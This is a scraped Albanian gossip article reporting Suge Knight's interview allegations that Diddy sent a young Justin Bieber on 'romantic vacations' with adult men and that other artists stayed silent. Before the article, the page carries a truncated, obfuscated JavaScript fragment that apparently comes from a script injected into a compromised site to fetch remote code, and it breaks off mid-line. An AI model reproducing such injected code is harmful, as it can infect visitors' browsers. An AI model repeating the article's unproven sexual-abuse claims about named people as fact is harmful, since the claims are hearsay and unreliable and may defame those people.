;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Akuza të reja: Diddy e dërgonte Bieber-in në pushime romantike me burra të rritur!

By

Një dëshmi tronditëse po qarkullon në rrjet.

Marion “Suge” Knight ka bërë deklarata të forta në lidhje me Justin Bieber dhe ndikimin që Sean “Diddy” Combs kishte mbi të kur ishte në fillimet e karrierës së tij. Në një intervistë të publikuar më 12 nëntor nga Michael Franzese në YouTube, Knight akuzoi Diddy-n dhe disa bashkëpunëtorë të tij për manipulim të Justin Bieber, duke e detyruar atë të merrte pjesë në “udhetime romantike” me burra të tjerë “të rritur dhe të suksesshëm”.

“Ai kishte burra të rritur që e merrnin Justin Bieber, e çonin me ta në pushime romantike,” tha Knight. Sipas tij, këto “pushime” nuk ishin thjesht udhëtime, por përfshinin aktivitete të dyshimta dhe të papranueshme që dëmtonin jo vetëm reputacionin e Bieber, por edhe moralin e industrisë.

Suge Knight nuk kursen kritika as për disa figura të tjera të njohura të industrisë muzikore, si Snoop Dogg dhe Usher, të cilët ai thotë se ishin të vetëdijshëm për këtë situatë, por e zgjedhën të heshtnin.

“Ata e dinin, por ata vendosën të heshtin,” tha Knight, duke shtuar se heshtja e tyre ishte po aq e dëmshme për Justin Bieber sa ato që mund të kenë bërë vetë Diddy dhe të tjerët.

Në një tjetër moment të intervistës, Knight shprehu shqetësimin për natyrën e marrëdhënieve që dyshohet të kenë ndodhur mes Diddy dhe bashkëpunëtorëve të tij me Bieber, duke sugjeruar se ato mund të kenë përfshirë kontakte seksuale.

“Më vjen keq ta them këtë, sepse e respektoj shumë Justin Bieber, por nuk do të kishte ndodhur asnjëherë nëse ai do të kishte ardhur nga një familje e pasur,” tha Knight, duke shtuar se Bieber kishte potencialin të ishte “më i madh se Michael Jackson”, por se rrethanat dhe mundësitë që ai pati ishin të kufizuara për shkak të kushteve të tij familjare

 

 

Artikuj të ngjashëm